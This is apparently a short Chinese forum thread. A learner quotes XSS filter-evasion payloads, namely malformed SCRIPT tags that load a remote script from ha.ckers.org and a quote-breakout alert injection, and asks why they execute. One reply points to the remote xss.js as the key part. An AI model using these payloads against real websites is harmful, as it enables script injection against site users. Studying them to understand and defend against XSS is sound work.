今天看了点xss攻击常见的具体形式,代码有点看不懂<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
\";alert('xss');//
这些代码貌似不符合html的语法规则吧,那这些恶意脚本怎么会运行呢?它们代表的又是什么意思呢?望大虾们指点啊! .
<SCRIPT a=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
\";alert('xss');//
这些代码貌似不符合html的语法规则吧,那这些恶意脚本怎么会运行呢?它们代表的又是什么意思呢?望大虾们指点啊! .
所有其关键是xss.js里的代码是什么??
那才是重点